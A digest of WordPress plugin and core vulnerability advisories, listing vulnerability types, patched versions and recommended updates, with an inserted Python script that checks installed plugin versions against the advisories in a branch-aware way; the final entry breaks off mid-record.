Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Learning Courses

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Advanced ads Management by Inazo

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.29
Recommended Action: Update to version 2.9.29, or a newer patched version

Plugin: Impreza – WordPress Website and WooCommerce Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.18
Recommended Action: Update to version 8.18, or a newer patched version

Plugin: Advanced WP Columns

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Table by Supsystic

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Insert or Embed Articulate Content into WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 4.2999
Recommended Action: Update to version 4.2999, or a newer patched version

Plugin: ZooEffect Plugin for Video player, Photo Gallery Slideshow jQuery and audio / music / podcast – HTML5

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional Payment Methods for WooCommerce

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HappyFiles Pro

Vulnerability: Missing Authorization to Arbitrary File Deletion
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection via asc_or_desc Parameter
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Plugin Settings Change
Patched Version: 1.0.64
Recommended Action: Update to version 1.0.64, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Authorization Bypass
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Booster Elite for WooCommerce

Vulnerability: Authenticated (Admin/Shop Manager+) Arbitrary File Download
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Quotes and Tips by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: JQuery Html5 File Upload

Vulnerability: Unauthenticated Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce

Vulnerability: Information Disclosure
Patched Version: 4.0.3
Recommended Action: Update to one of the following versions, or a newer patched version: 4.0.3, 4.1.3, 4.2.4, 4.3.5, 4.4.3, 4.5.4, 4.6.4, 4.7.3, 4.8.2, 4.9.4, 5.0.2, 5.1.2, 5.2.4, 5.3.2, 5.4.3, 5.5.3, 5.6.1, 5.7.0

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: Comic Book Management System

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Login with Cognito

Vulnerability: Authentication Bypass
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.18
Recommended Action: Update to version 1.6.18, or a newer patched version

Plugin: google-analytics-dashboard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Passwords Manager

Vulnerability: Cross-Site Scripting via pwdms_csv_category parameter
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Easy Accordion – Responsive Accordion FAQ Builder and Product FAQ

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Event Banner

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kish Guest Posting

Vulnerability: Arbitrary File Upload
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘ucss_connect’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Debugging

Vulnerability: Unauthenticated Plugin Settings Update
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: TDO Mini Forms

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Access Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: AdPlugg WordPress Ad Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.34
Recommended Action: Update to version 1.1.34, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.11.2
Recommended Action: Update to version 1.11.2, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: WPFactory Helper

Vulnerability: Reflected Cross-Site Scripting via item_slug
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WooCommerce Wishlist (High customization, fast setup, Free Elementor Wishlist, most features)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WP Post Styling

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Easy Calendar

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple 301 Redirects – Addon – Bulk Uploader

Vulnerability: Missing Authorization
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Portfolio – WordPress Portfolio Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: Video Lessons Manager – WordPress LMS Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Login Lockdown & Protection

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Reservation.Studio widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Dragfy Addons for Elementor

Vulnerability: Missing Authorization via save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Style Kits – Advanced Theme Styles for Elementor

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.8.3
Recommended Action: Update to version 8.8.3, or a newer patched version

Plugin: Realteo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Data Access – App, Table, Form and Chart Builder plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: WP Google Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 11.8
Recommended Action: Update to version 11.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Missing Authorization to Arbitrary Shortcode Execution via userpro_shortcode_template
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: SendGrid

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SMTP2GO for WordPress – Email Made Easy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: WPCargo Track & Trace

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.9.5
Recommended Action: Update to version 6.9.5, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: HTTP Host Header Injection
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Google Maps

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting via Import Tool
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Content Grabber

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Grab & Save

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shibboleth

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: GD Security Headers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass to Term Disclosure
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: WPCB

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Flexi Quote Rotator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Membership

Vulnerability: Privilege Escalation via Registration
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: Banner Management For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Age Gate

Vulnerability: Open Redirect
Patched Version: 2.13.5
Recommended Action: Update to version 2.13.5, or a newer patched version

Plugin: Custom Order Numbers for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: Birthdays Widget

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Missing Authorization to Initial Page Creation
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via userpro_save_userdata
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Easy Affiliate Links

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Settings
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Missing Authorization
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: Schedule Posts Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Plugin De-Installation
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Yoast SEO: Local

Vulnerability: Cross-Site Request Forgery
Patched Version: 14.9
Recommended Action: Update to version 14.9, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 7.95
Recommended Action: Update to version 7.95, or a newer patched version

Plugin: WDContactFormBuilder

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.0.25
Recommended Action: Update to version 1.0.25, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Tutor Instructor+) SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Theme Image Change
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization via wpas_load_reply_history
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: 123ContactForm for WordPress

Vulnerability: Arbitrary Post Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Authorizer

Vulnerability: Service Hostname Discovery Exploitation
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Multiple Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.18
Recommended Action: Update to version 1.3.18, or a newer patched version

Plugin: js-restaurant

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: MF Gig Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Users Exporter

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Real3D Flipbook

Vulnerability: File Upload to User Controlled Location
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: heat-trackr

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.01
Recommended Action: Update to version 1.01, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 21.1.2.1
Recommended Action: Update to version 21.1.2.1, or a newer patched version

Plugin: Claptastic Clap! Button

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EZ Portfolio (Unmaintained)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Google Analytics Counter Tracker

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Lightbox Plus

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.3.0
Recommended Action: Update to version 5.2.3.0, or a newer patched version

Plugin: amtyThumb

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Theme Tweaker

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cryptocurrency Pricing list and Ticker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customize WordPress Emails and Alerts – Better Notifications for WP

Vulnerability: Cross-Site Request Forgery via handle_actions
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Print Invoice & Delivery Notes for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization to Settings Update
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: SQL Injection
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Easy Media Download

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Comments
Patched Version: 3.7.8
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.8, 3.8.8, 3.9.6, 4.0.5, 4.1.5, 4.2.2
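
The "update to one of the following versions" lists used by the WooCommerce entry and the WordPress core entries above describe branch-specific backports: a site is fixed only if it runs a release at or above the fix for its own major.minor branch (a site on 4.4.1 needs 4.4.3 or later, not 5.7.0), or at or above the newest listed release. The check below is an added example and is not part of this digest or of any plugin's tooling. It takes the JSON that WP-CLI's `wp plugin list --format=json` prints (fields `name`, `status`, `update`, `version`) plus the output of `wp core version`, and compares them against a small advisory table transcribed from this page. The plugin slugs in that table, the sample plugin list, and the core version are assumptions constructed for the example.

```python
"""Branch-aware check of installed WordPress plugin/core versions against this digest's
advisories (example added to the page; not the digest's own tooling)."""
from __future__ import annotations

import json
from dataclasses import dataclass


def parse_version(v: str) -> tuple[int, ...]:
    """'5.7.0' -> (5, 7, 0). Non-numeric characters inside a component are dropped."""
    parts = []
    for piece in v.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


@dataclass(frozen=True)
class Advisory:
    component: str            # plugin slug as shown by `wp plugin list`, or "wordpress" for core
    title: str
    patched: tuple[str, ...]  # every fixed release the digest lists; () means no patch available


def is_patched(installed: str, patched: tuple[str, ...]) -> bool:
    """True when the installed version is at or above the fix for its own major.minor
    branch, or at or above the newest fixed release overall."""
    if not patched:
        return False
    inst = parse_version(installed)
    fixes = sorted(parse_version(p) for p in patched)
    if inst >= fixes[-1]:
        return True
    for fix in fixes:
        if fix[:2] == inst[:2]:          # same major.minor branch: compare within the branch
            return inst >= fix
    # No backport exists for this branch and the site is below the newest fix: vulnerable.
    return False


# Transcribed from this digest; the slugs are assumed (confirm them with `wp plugin list`).
ADVISORIES = (
    Advisory("woocommerce", "Information Disclosure",
             ("4.0.3", "4.1.3", "4.2.4", "4.3.5", "4.4.3", "4.5.4", "4.6.4", "4.7.3", "4.8.2",
              "4.9.4", "5.0.2", "5.1.2", "5.2.4", "5.3.2", "5.4.3", "5.5.3", "5.6.1", "5.7.0")),
    Advisory("wordpress", "Cross-Site Scripting via Comments",
             ("3.7.8", "3.8.8", "3.9.6", "4.0.5", "4.1.5", "4.2.2")),
    Advisory("formidable", "Unauthenticated PHP Object Injection", ("6.2",)),
    Advisory("simple-file-list", "Unauthenticated Arbitrary File Deletion", ("6.1.10",)),
    Advisory("wp-users-exporter", "CSV Injection", ()),
)


def find_exposures(plugin_list_json: str, core_version: str,
                   advisories: tuple[Advisory, ...] = ADVISORIES) -> list[dict]:
    """Match `wp plugin list --format=json` output (plus `wp core version`) against advisories.
    Inactive plugins are still reported: their files stay on disk until the plugin is deleted."""
    installed = {p["name"]: p["version"] for p in json.loads(plugin_list_json)}
    installed["wordpress"] = core_version
    findings = []
    for adv in advisories:
        version = installed.get(adv.component)
        if version is None or is_patched(version, adv.patched):
            continue
        findings.append({
            "component": adv.component,
            "installed": version,
            "title": adv.title,
            "action": ("update to " + ", ".join(adv.patched)) if adv.patched
                      else "no patch available: mitigate or remove the plugin",
        })
    return findings


# Constructed sample (not from a real site) in the shape `wp plugin list --format=json` emits.
SAMPLE_PLUGIN_LIST = json.dumps([
    {"name": "woocommerce", "status": "active", "update": "available", "version": "4.4.1"},
    {"name": "formidable", "status": "active", "update": "none", "version": "6.2.1"},
    {"name": "simple-file-list", "status": "inactive", "update": "available", "version": "6.1.9"},
    {"name": "wp-users-exporter", "status": "active", "update": "none", "version": "1.0"},
])
SAMPLE_CORE_VERSION = "4.1.4"  # constructed: sits in the 4.1 branch below its 4.1.5 fix

if __name__ == "__main__":
    for f in find_exposures(SAMPLE_PLUGIN_LIST, SAMPLE_CORE_VERSION):
        print(f"{f['component']} {f['installed']}: {f['title']} -> {f['action']}")
```

On a real host, feed it `wp plugin list --format=json` and `wp core version` run from the site's webroot (or with `--path=`). The conservative choice in `is_patched` is deliberate: a site whose branch has no listed backport and which is below the newest fix is reported as exposed rather than silently skipped, and an entry with no patched version is always reported so that the "mitigate or remove" decision is made explicitly.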

Plugin: Web Push Notifications – Webpushr

Vulnerability: Missing Authorization to Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.35.0
Recommended Action: Update to version 4.35.0, or a newer patched version

Plugin: Bonuspressx

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Timesheet by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.5
Recommended Action: Update to version 0.1.5, or a newer patched version

Plugin: LinkWorth Plugin

Vulnerability: Cross-Site Request Forgery to Plugin Setting Update
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Showing URL in QR Code

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Travelpayouts: All Travel Brands in One Place

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.17
